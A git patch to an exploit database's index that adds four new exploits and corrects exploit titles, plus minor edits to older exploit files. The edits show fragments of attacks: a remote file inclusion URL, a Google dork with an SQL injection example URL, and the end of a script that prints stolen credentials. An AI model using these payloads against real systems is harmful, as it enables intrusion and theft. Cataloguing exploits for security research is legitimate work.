From 9e4de03a13c7a1edc5654f3e264511b262839f96 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 14 Nov 2017 05:01:29 +0000 Subject: [PATCH] DB: 2017-11-14 4 new exploits Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC) Symantec Endpoint Protection 12.1 - Tamper-Protection Bypass IKARUS anti.virus 2.16.7 - 'ntguard_x64' Privilege Escalation IBM Websphere 6.0 - Faultactor Cross-Site Scripting IBM Websphere 6.0 - 'Faultactor' Cross-Site Scripting Coppermine Photo Gallery 1.3.2 - File Retrieval SQL Injection Coppermine Photo Gallery 1.3.2 - File Retrieval / SQL Injection MemHT Portal 4.0.1 - SQL Injection Code Execution MemHT Portal 4.0.1 - SQL Injection / Code Execution AWCM 2.1 final - Remote File Inclusion AWCM 2.1 Final - Remote File Inclusion Invision Power Board 3 - search_app SQL Injection Invision Power Board 3 - 'search_app' SQL Injection PHP-Nuke 7.x - Content Filtering Byapss PHP-Nuke 7.x - Content Filtering Bypass Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload --- files.csv | 16 +- platforms/multiple/remote/28981.txt | 2 +- platforms/php/webapps/1317.py | 2 +- platforms/php/webapps/15510.txt | 5 +- platforms/php/webapps/15515.txt | 2 +- platforms/php/webapps/26817.txt | 4 +- platforms/php/webapps/38688.txt | 4 +- platforms/php/webapps/43138.rb | 249 +++++++++++++++++++++++++ platforms/php/webapps/7114.txt | 2 +- platforms/windows/dos/43135.py | 38 ++++ platforms/windows/local/43134.c | 142 ++++++++++++++ platforms/windows/local/43139.c | 277 ++++++++++++++++++++++++++++ 12 files changed, 725 insertions(+), 18 deletions(-) create mode 100755 platforms/php/webapps/43138.rb create mode 100755 platforms/windows/dos/43135.py create mode 100755 platforms/windows/local/43134.c create mode 100755 platforms/windows/local/43139.c diff --git a/files.csv b/files.csv index 0c61c5bcc..d2ff02b9e 100644 --- a/files.csv +++ b/files.csv @@ -5729,6 +5729,7 @@ id,file,description,date,author,platform,type,port 43119,platforms/hardware/dos/43119.py,"Debut Embedded httpd 1.20 - Denial of Service",2017-11-02,z00n,hardware,dos,0 43120,platforms/windows/dos/43120.txt,"Avaya OfficeScan (IPO) < 10.1 - ActiveX Buffer Overflow",2017-11-05,hyp3rlinx,windows,dos,0 43124,platforms/windows/dos/43124.py,"SMPlayer 17.11.0 - '.m3u' Buffer Overflow (PoC)",2017-11-05,bzyo,windows,dos,0 +43135,platforms/windows/dos/43135.py,"Xlight FTP Server 3.8.8.5 - Buffer Overflow (PoC)",2017-11-07,bzyo,windows,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -9320,6 +9321,8 @@ id,file,description,date,author,platform,type,port 43104,platforms/windows/local/43104.py,"Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Buffer Overflow (SEH)",2017-10-05,"Venkat Rajgor",windows,local,0 43109,platforms/windows/local/43109.c,"Vir.IT eXplorer Anti-Virus 8.5.39 - 'VIAGLT64.SYS' Privilege Escalation",2017-11-01,"Parvez Anwar",windows,local,0 43127,platforms/linux/local/43127.c,"Linux Kernel 4.13 (Ubuntu 17.10) - 'waitid()' SMEP/SMAP/Chrome Sandbox Privilege Escalation",2017-11-06,"Chris Salls",linux,local,0 +43134,platforms/windows/local/43134.c,"Symantec Endpoint Protection 12.1 - Tamper-Protection Bypass",2017-11-10,hyp3rlinx,windows,local,0 +43139,platforms/windows/local/43139.c,"IKARUS anti.virus 2.16.7 - 'ntguard_x64' Privilege Escalation",2017-11-13,"Parvez Anwar",windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -14168,7 +14171,7 @@ id,file,description,date,author,platform,type,port 28968,platforms/windows/remote/28968.html,"Aladdin Knowledge Systems Ltd. PrivAgent - ActiveX Control Overflow",2013-10-15,blake,windows,remote,0 28973,platforms/windows/remote/28973.rb,"HP Data Protector - Cell Request Service Buffer Overflow (Metasploit)",2013-10-15,Metasploit,windows,remote,0 28974,platforms/windows/remote/28974.rb,"Microsoft Internet Explorer - CDisplayPointer Use-After-Free (MS13-080) (Metasploit)",2013-10-15,Metasploit,windows,remote,0 -28981,platforms/multiple/remote/28981.txt,"IBM Websphere 6.0 - Faultactor Cross-Site Scripting",2006-11-13,"Nuri Fattah",multiple,remote,0 +28981,platforms/multiple/remote/28981.txt,"IBM Websphere 6.0 - 'Faultactor' Cross-Site Scripting",2006-11-13,"Nuri Fattah",multiple,remote,0 28987,platforms/multiple/remote/28987.c,"Digipass Go3 - Insecure Encryption",2006-11-13,faypou,multiple,remote,0 29032,platforms/windows/remote/29032.txt,"Conxint FTP 2.2.603 - Multiple Directory Traversal Vulnerabilities",2006-11-15,"Greg Linares",windows,remote,0 29033,platforms/linux/remote/29033.html,"Links_ ELinks 'smbclient' - Remote Command Execution",2006-11-18,"Teemu Salmela",linux,remote,0 @@ -16779,7 +16782,7 @@ id,file,description,date,author,platform,type,port 1298,platforms/php/webapps/1298.php,"ATutor 1.5.1pl2 - SQL Injection / Command Execution",2005-11-07,rgod,php,webapps,0 1312,platforms/php/webapps/1312.php,"Moodle 1.6dev - SQL Injection / Command Execution",2005-11-10,rgod,php,webapps,0 1315,platforms/php/webapps/1315.php,"XOOPS (wfdownloads) 2.05 Module - Multiple Vulnerabilities",2005-11-12,rgod,php,webapps,0 -1317,platforms/php/webapps/1317.py,"Coppermine Photo Gallery 1.3.2 - File Retrieval SQL Injection",2005-11-13,DiGiTAL_MiDWAY,php,webapps,0 +1317,platforms/php/webapps/1317.py,"Coppermine Photo Gallery 1.3.2 - File Retrieval / SQL Injection",2005-11-13,DiGiTAL_MiDWAY,php,webapps,0 1319,platforms/php/webapps/1319.php,"Unclassified NewsBoard 1.5.3 Patch 3 - Blind SQL Injection",2005-11-14,rgod,php,webapps,0 1320,platforms/php/webapps/1320.txt,"Arki-DB 1.0 - 'catid' SQL Injection",2005-11-14,Devil-00,php,webapps,0 1321,platforms/php/webapps/1321.pl,"Cyphor 0.19 - 'show.php?id' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 @@ -20770,7 +20773,7 @@ id,file,description,date,author,platform,type,port 7111,platforms/php/webapps/7111.txt,"ScriptsFeed (SF) Auto Classifieds Software - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps,0 7112,platforms/php/webapps/7112.txt,"ScriptsFeed (SF) Recipes Listing Portal - Arbitrary File Upload",2008-11-13,ZoRLu,php,webapps,0 7113,platforms/php/webapps/7113.txt,"BandSite CMS 1.1.4 - Insecure Cookie Handling",2008-11-13,Stack,php,webapps,0 -7114,platforms/php/webapps/7114.txt,"MemHT Portal 4.0.1 - SQL Injection Code Execution",2008-11-13,Ams,php,webapps,0 +7114,platforms/php/webapps/7114.txt,"MemHT Portal 4.0.1 - SQL Injection / Code Execution",2008-11-13,Ams,php,webapps,0 7116,platforms/php/webapps/7116.txt,"Alstrasoft Web Host Directory 1.2 - Multiple Vulnerabilities",2008-11-14,G4N0K,php,webapps,0 7117,platforms/php/webapps/7117.txt,"GS Real Estate Portal US/International Module - Multiple Vulnerabilities",2008-11-14,ZoRLu,php,webapps,0 7118,platforms/php/webapps/7118.txt,"TurnkeyForms - Text Link Sales Authentication Bypass",2008-11-14,G4N0K,php,webapps,0 @@ -24954,10 +24957,10 @@ id,file,description,date,author,platform,type,port 15506,platforms/hardware/webapps/15506.txt,"Camtron CMNC-200 IP Camera - Authentication Bypass",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0 15507,platforms/hardware/webapps/15507.txt,"Camtron CMNC-200 IP Camera - Undocumented Default Accounts",2010-11-13,"Trustwave's SpiderLabs",hardware,webapps,0 15509,platforms/php/webapps/15509.txt,"Build a Niche Store 3.0 - 'BANS' Authentication Bypass",2010-11-13,"ThunDEr HeaD",php,webapps,0 -15510,platforms/php/webapps/15510.txt,"AWCM 2.1 final - Remote File Inclusion",2010-11-13,LoSt.HaCkEr,php,webapps,0 +15510,platforms/php/webapps/15510.txt,"AWCM 2.1 Final - Remote File Inclusion",2010-11-13,LoSt.HaCkEr,php,webapps,0 15512,platforms/php/webapps/15512.py,"DBSite - SQL Injection",2010-11-13,God_Of_Pain,php,webapps,0 15513,platforms/php/webapps/15513.txt,"WordPress Plugin Event Registration 5.32 - SQL Injection",2010-11-13,k3m4n9i,php,webapps,0 -15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 - search_app SQL Injection",2010-11-13,"Lord Tittis3000",php,webapps,0 +15515,platforms/php/webapps/15515.txt,"Invision Power Board 3 - 'search_app' SQL Injection",2010-11-13,"Lord Tittis3000",php,webapps,0 15516,platforms/php/webapps/15516.txt,"EasyJobPortal - Arbitrary File Upload",2010-11-13,MeGo,php,webapps,0 15517,platforms/php/webapps/15517.txt,"Webmatic - 'index.php' SQL Injection",2010-11-13,v3n0m,php,webapps,0 15518,platforms/php/webapps/15518.txt,"Joomla! Component CCBoard 1.2-RC - Multiple Vulnerabilities",2010-11-13,jdc,php,webapps,0 @@ -29353,7 +29356,7 @@ id,file,description,date,author,platform,type,port 26813,platforms/php/webapps/26813.txt,"Jamit Job Board 2.4.1 - 'index.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 26814,platforms/php/webapps/26814.txt,"DreamLevels Dream Poll 3.0 - 'View_Results.php' SQL Injection",2005-12-14,r0t3d3Vil,php,webapps,0 26815,platforms/php/webapps/26815.txt,"CourseForum Technologies ProjectForum 4.7 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,r0t3d3Vil,php,webapps,0 -26817,platforms/php/webapps/26817.txt,"PHP-Nuke 7.x - Content Filtering Byapss",2005-12-14,"Maksymilian Arciemowicz",php,webapps,0 +26817,platforms/php/webapps/26817.txt,"PHP-Nuke 7.x - Content Filtering Bypass",2005-12-14,"Maksymilian Arciemowicz",php,webapps,0 26818,platforms/php/webapps/26818.txt,"News Module for Envolution - 'modules.php' Multiple Cross-Site Scripting Vulnerabilities",2005-12-14,X1ngBox,php,webapps,0 26819,platforms/php/webapps/26819.txt,"News Module for Envolution - 'modules.php' Multiple SQL Injections",2005-12-14,X1ngBox,php,webapps,0 26820,platforms/asp/webapps/26820.txt,"ASP-DEV XM Forum - 'forum.asp' Cross-Site Scripting",2005-12-14,Dj_Eyes,asp,webapps,0 @@ -38820,3 +38823,4 @@ id,file,description,date,author,platform,type,port 43123,platforms/multiple/webapps/43123.txt,"Logitech Media Server 7.9.0 - 'Radio URL' Cross-Site Scripting",2017-11-03,"Dewank Pant",multiple,webapps,0 43128,platforms/php/webapps/43128.txt,"pfSense 2.3.1_1 - Command Execution",2017-11-07,s4squatch,php,webapps,0 43129,platforms/windows/webapps/43129.txt,"ManageEngine Applications Manager 13 - SQL Injection",2017-11-07,"Cody Sixteen",windows,webapps,9090 +43138,platforms/php/webapps/43138.rb,"Web Viewer 1.0.0.193 (Samsung SRN-1670D) - Unrestricted File Upload",2017-11-13,0xFFFFFF,php,webapps,0 diff --git a/platforms/multiple/remote/28981.txt b/platforms/multiple/remote/28981.txt index 161ce5d90..866a6bd6a 100755 --- a/platforms/multiple/remote/28981.txt +++ b/platforms/multiple/remote/28981.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code execute in the WebSphere Application Server 6 is vulnerable; other versions may also be affected. -GET / HTTP/1.1 \ No newline at end of file +GET / HTTP/1.1 \ No newline at end of file diff --git a/platforms/php/webapps/1317.py b/platforms/php/webapps/1317.py index 00a0f67bc..adce96a7c 100755 --- a/platforms/php/webapps/1317.py +++ b/platforms/php/webapps/1317.py @@ -62,4 +62,4 @@ passwd=conf[:conf.find("'")] print '[+]Exploit Succeed' print '[+]User :', user, 'Pass :', passwd -# milw0rm.com [2005-11-13] \ No newline at end of file +# milw0rm.com [2005-11-13] \ No newline at end of file diff --git a/platforms/php/webapps/15510.txt b/platforms/php/webapps/15510.txt index 8918da984..fb04d9c06 100755 --- a/platforms/php/webapps/15510.txt +++ b/platforms/php/webapps/15510.txt @@ -12,7 +12,4 @@ http://sourceforge.net/projects/awcm/files/ [+]Exploit: http://target/awcm v2.1 final/awcm/header.php?theme_file=[EV!L] ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Greetings:  No Greet  !_! - - - \ No newline at end of file +Greetings:  No Greet  !_! \ No newline at end of file diff --git a/platforms/php/webapps/15515.txt b/platforms/php/webapps/15515.txt index 5f08bfc00..28e5708ca 100755 --- a/platforms/php/webapps/15515.txt +++ b/platforms/php/webapps/15515.txt @@ -9,4 +9,4 @@ The vulnerability is in the file search.php, the variable search_app is vulnerable.An attacker can exploit this to find out the rootpath of website or for Blind SQLi attack. -Google Dork: inurl:index.php?app=core --Example:http://server/index.php?app=core&module=search§ion=search&do=quick_search&search_app[]= \ No newline at end of file +-Example:http://server/index.php?app=core&module=search§ion=search&do=quick_search&search_app[]= \ No newline at end of file diff --git a/platforms/php/webapps/26817.txt b/platforms/php/webapps/26817.txt index 35f65deb1..23fbf77f9 100755 --- a/platforms/php/webapps/26817.txt +++ b/platforms/php/webapps/26817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/15855/info + source: http://www.securityfocus.com/bid/15855/info PHPNuke is prone to a content filtering bypass vulnerability. This issue can allow an attacker to bypass content filters and potentially carry out cross-site scripting, HTML injection and other attacks. @@ -12,4 +12,4 @@ Insert: URI: http://www.example.com/[DIR]//modules.php?name=Web_Links Insert: -